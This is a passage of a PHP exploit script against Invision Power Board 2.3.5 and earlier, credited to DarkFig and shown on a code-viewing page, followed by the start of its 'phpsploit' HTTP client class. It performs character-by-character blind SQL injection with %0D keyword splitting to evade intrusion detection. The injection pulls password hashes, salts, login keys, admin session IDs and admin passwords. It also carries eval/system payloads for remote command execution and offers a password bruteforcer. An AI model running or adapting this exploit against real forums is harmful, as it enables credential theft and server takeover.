📄 exp.php
字号:
return;
}
function get_cprefix()
{
$this->msg('Trying to get the cookie prefix', 0);
# Set-Cookie: session_id=...; path=/
$this->web->get($this->p_url);
$this->s_cprefix = '';
if( $this->web->cookie )
{
foreach( $this->web->cookie as $name => $value)
{
if( preg_match($this->reg_cpre, $name, $cmatches) )
{
$this->s_cprefix = $cmatches[1];
break;
}
}
}
if( !$this->s_cprefix )
$this->msg('No cookie prefix set', 1);
else
$this->msg('Using cookie prefix '.$this->s_cprefix, 1);
return;
}
function get_sec_options()
{
# If no value, take the default one
$this->get_conf('t.conf_value');
$this->get_conf('t.conf_default');
return;
}
function get_conf($field)
{
$this->init_sql();
$this->t_table = 'conf_settings';
$this->t_field = $field;
$this->t_char = $this->chr_num;
$this->t_add_0 = "AND t.conf_key='match_browser'";
if( $this->conf['browser'] === '' )
$this->conf['browser'] = $this->bf_inj();
$this->t_add_0 = "AND t.conf_key='match_ipaddress'";
if( $this->conf['ip'] === '' )
$this->conf['ip'] = $this->bf_inj();
$this->t_add_0 = "AND t.conf_key='xforward_matching'";
if( $this->conf['xforward'] === '' )
$this->conf['xforward'] = $this->bf_inj();
return;
}
function get_login_key()
{
$this->init_sql();
$this->t_key = 'login_key';
$this->t_table = 'members';
$this->t_field = 't.member_login_key';
$this->t_join = 't.id=m.id';
$this->t_char = $this->chr_md5;
$this->data['login_key'] = $this->bf_inj();
return $this->key_val;
}
function get_sql_user()
{
$this->init_sql();
$this->t_key = 'user()';
$this->t_table = 'members';
$this->t_field = 'user()';
$this->t_char = $this->chr_all;
$this->t_end = '@';
$this->data['sql_user'] = $this->bf_inj();
return $this->key_val;
}
function get_pass_hash()
{
$this->init_sql();
$this->t_key = 'pass_hash';
$this->t_table = 'members_converge';
$this->t_field = 't.converge_pass_hash';
$this->t_join = 't.converge_email=m.email';
$this->t_char = $this->chr_md5;
$this->data['pass_hash'] = $this->bf_inj();
return $this->key_val;
}
function get_pass_salt()
{
$this->init_sql();
$this->t_key = 'pass_salt';
$this->t_table = 'members_converge';
$this->t_field = 't.converge_pass_salt';
$this->t_join = 't.converge_email=m.email';
$this->t_char = $this->chr_all;
$this->data['pass_salt'] = $this->bf_inj();
return $this->key_val;
}
function get_admin_sess()
{
$this->init_sql();
$this->t_key = 'admin_sid';
$this->t_table = 'admin_sessions';
$this->t_field = 't.session_id';
$this->t_join = 't.session_member_id=m.id';
$this->t_sel = 't.session_log_in_time';
$this->t_char = $this->chr_md5;
$this->data['a_sess_id'] = $this->bf_inj();
return $this->key_val;
}
function get_admin_ip()
{
$this->init_sql();
$this->t_key = 'admin_ip';
$this->t_table = 'admin_sessions';
$this->t_field = 't.session_ip_address';
$this->t_join = 't.session_member_id=m.id';
$this->t_sel = 't.session_log_in_time';
$this->t_char = $this->chr_ip;
$this->data['a_ip_addr'] = $this->bf_inj();
return $this->key_val;
}
function get_admin_pwd()
{
$this->init_sql();
$this->t_key = 'admin_pwd';
$this->t_table = 'admin_login_logs';
$this->t_field = 't.admin_post_details';
$this->t_join = 't.admin_username=m.members_l_username';
$this->t_sel = 't.admin_id';
$this->t_end = '"';
$this->t_bchar = -4; # ";}}
$this->t_char = $this->chr_all;
$this->data['a_pwd_like']= $this->bf_inj();
return $this->key_val;
}
function get_user_sess()
{
$this->init_sql();
$this->t_key = 'user_sid';
$this->t_table = 'sessions';
$this->t_field = 't.id';
$this->t_join = 't.member_id=m.id';
$this->t_sel = 't.running_time';
$this->t_char = $this->chr_md5;
$this->data['u_sess_id'] = $this->bf_inj();
return $this->key_val;
}
function get_user_ip()
{
$this->init_sql();
$this->t_key = 'user_ip';
$this->t_table = 'sessions';
$this->t_field = 't.ip_address';
$this->t_join = 't.member_id=m.id';
$this->t_sel = 't.running_time';
$this->t_char = $this->chr_ip;
$this->data['u_ip_addr'] = $this->bf_inj();
return $this->key_val;
}
function get_user_agent()
{
$this->init_sql();
$this->t_key = 'user_agent';
$this->t_table = 'sessions';
$this->t_field = 't.browser';
$this->t_join = 't.member_id=m.id';
$this->t_sel = 't.running_time';
$this->t_char = $this->chr_all;
$this->data['u_agent'] = $this->bf_inj();
return $this->key_val;
}
function init_sql()
{
# SQL Injection params
$this->t_end = null;
$this->t_add_0 = '';
$this->t_add_1 = '';
$this->t_sel = '1';
$this->t_bchar = 0;
$this->t_join = '';
$this->t_key = '';
$this->t_add_1 = 'ORDER BY id DESC LIMIT 1';
return;
}
function init_global()
{
# Charsets
$this->chr_spe = str_split(' :/;*(-.!,?§*μù%$£^¨=+})°]à?^_\\`è|[\'{#é~&2"@');
$this->chr_num = range(0, 9);
$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
$this->chr_ip = array_merge( $this->chr_num, array('.') );
$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );
$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );
# SQL Injection
$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';
# IDS Evasion via %0D
$this->def_inj = "' OR 1=\"'\" U%0DNION %rep_req% OR 1=\"'\" %rep_add% #";
# Results
$this->data = array();
$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');
# Misc
$this->stat = array(-1 => '-', 0 => '/', 1 => '+');
$this->s_bypass = false;
$this->res_sep = md5(rand());
$this->def_ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);
# PHP Code
$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';
$this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));";
$this->php_send .= "print('$this->res_sep');exit(0);";
# Regex
$this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i";
$this->reg_cpre = '#^(.*)session_id$#';
# $this->reg_acp = '#<a href="(.*)"[\x20]+target="_blank"#i';
# Default client headers
$this->s_agent = 'Mozilla Firefox';
$this->s_ip = $this->def_ip;
return;
}
function bf_inj()
{
$this->sub_chr = $this->t_bchar;
$this->key_val = '';
if( !empty($this->t_key) )
$this->msg('', 0);
while( true )
{
if( $this->t_bchar < 0 )
$this->sub_chr--;
else
$this->sub_chr++;
# 0-9a-f
for( $j=0;$j<=count($this->t_char);$j++ )
{
# That one ?
$chr = $this->t_char[$j];
# Latest char ?
if( $j === count($this->t_char) )
$chr = $this->t_end;
# Ascii num
$asc = ord($chr);
# Screen bug
if( !empty($this->t_key) )
{
$msg = $this->t_key.'='.$this->key_val;
$msg .= ($chr === $this->t_end ? "\x20" : $chr);
$this->msg($msg, 0, 1, 1);
}
# Focus on the target ?
if( !empty($this->t_join) )
{
$inj =
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join.
' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field.
','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;
}
else
{
$inj =
'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
',1))='.$asc.' '.$this->t_add_0;
}
# SQL Injection via rawurldecode()
$inj = str_replace('%rep_req%', $inj, $this->def_inj);
$inj = str_replace('%rep_add%', $this->t_add_1, $inj);
$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
# Params
$inj = str_replace('%rep_inj%', $inj, $this->def_param);
$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
$this->web->get($this->p_url.$inj);
# Ok !?
if( !strstr($this->web->getcontent(), 'notfound') )
{
if( $chr !== $this->t_end )
{
$this->key_val .= $chr;
break;
}
}
# End
if( $chr === $this->t_end )
{
# Reverse
if( $this->t_bchar < 0 )
$this->key_val = strrev($this->key_val);
if( !empty($this->t_key) )
$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);
return $this->key_val;
}
}
}
}
function get_p($p, $exit=false)
{
global $argv;
foreach( $argv as $key => $value )
{
if( $value === '-'.$p )
{
if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
{
return $argv[$key+1];
}
else
{
if( $exit )
$this->usage();
return true;
}
}
}
if( $exit )
$this->usage();
return false;
}
function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
{
if( $ndel ) $type = "\r";
else $type = "\n";
# wtf (:
print
(
$type.str_repeat("\x20", $nspace).
$this->stat[$nstatus]."\x20".$msg
);
if( $ask )
return trim(fgets(STDIN));
}
function give_hope()
{
$this->msg('You should try with another user or try another time', -1);
exit(1);
}
function mhead()
{
# Advisory: http://acid-root.new.fr/?0:18
print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";
print "\n ------------------------------------------------------";
print "\n\n About:";
print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
print "\n http://acid-root.new.fr/";
print "\n #acidroot@irc.worldnet.net";
print "\n\n\n Attack(s):\n";
return;
}
function usage()
{
print "\n -attack <int_choice> <params> [options]\n\n";
print " 1 - PHP code execution\n\n";
print " -url IPB url with ending slash\n\n";
print " -uname targeted username\n";
print " -uid OR the targeted user id (def: 1)\n\n";
print " -prefix sql table prefix (def: ibf_)\n";
print " -acp admin control panel path (def: admin)\n\n\n";
print " 2 - Insecure SQL password usage\n\n";
print " -ip your current IP\n";
print " -dict a wordlist file\n\n";
print " -url IPB url with ending slash\n";
print " -uname a valid member username\n";
print " -pwd the associated password\n\n";
print " -uid OR the targeted member id\n";
print " -passhash the passhash cookie value\n";
print " -stronghold the stronghold cookie value\n\n";
print " -sqlusr you can precise the sql user\n";
print " -prefix sql table prefix (def: ibf_)\n\n\n";
print " 3 - Password bruteforcer\n\n";
print " -dict a wordlist file\n\n";
print " -url IPB url with ending slash\n";
print " -uname targeted username\n";
print " -uid OR the targeted user id (def: 1)\n";
print " -prefix sql table prefix (def: ibf_)\n\n";
print " -passhash OR the passhash value\n";
print " -salt the salt value\n\n\n";
print " Optional: \n\n";
print " -proxhost <ip> if you wanna use a proxy\n";
print " -proxauth <usr:pwd> proxy with authentication\n";
exit(1);
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.1
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2008-08-29] (2.1)
* * New: The showheader()/showcookie() functions can now return an array
* * Bug #3 fixed: Problem concerning some servers for the main function
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -